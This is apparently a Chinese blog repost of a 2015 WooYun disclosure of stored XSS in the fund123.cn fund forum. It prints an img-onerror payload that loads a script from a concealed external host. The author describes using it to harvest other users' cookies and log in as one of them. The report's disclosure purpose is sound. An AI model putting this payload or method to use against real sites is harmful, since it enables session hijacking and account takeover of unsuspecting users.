记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

数米基金网某主要功能存在存储型XSS漏洞(可劫持其他用户Cookie已证明)

2015-10-24 20:10

1.官网介绍截图,蚂蚁金服是第一大股东

屏幕快照 2015-09-03 09.13.30.png



2.注册一个账号,然后在论坛发帖,论坛地址http://bbs.fund123.cn/。发现可以插入图片。

屏幕快照 2015-09-03 14.46.44.png



3.插入图片后,打开console,把img标签内容替换成payload,具体网址已经隐藏

code 区域
<img src="x" style="display:none;" onerror="s=createElement('script');body.appendChild(s);s.src='你猜';">





屏幕快照 2015-09-03 15.08.51.png





4.发帖成功后就去等着收cookie吧。



屏幕快照 2015-09-03 15.12.37.png





5.随便找一个cookie登录,看看内容吧,我就不打管理员的cookie了,管理员的权限应该会很大。

屏幕快照 2015-09-03 11.46.11.png



屏幕快照 2015-09-03 11.46.23.png



屏幕快照 2015-09-03 11.46.46.png





6.马我就不挂了,整个页面随便操作,想挂什么就挂什么。。。



7.帖子里的代码我会处理掉的,如果我有忘记的,你们自己处理吧。给你们留个回帖做纪念,控制台输出wooyun.org。地址:http://bbs.fund123.cn/tzjlq/tzjl/post_603045_2

漏洞证明:

同上

修复方案:

增加过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-0139238

阅读:101268 | 评论:0 | 标签:xss 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“数米基金网某主要功能存在存储型XSS漏洞(可劫持其他用户Cookie已证明)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云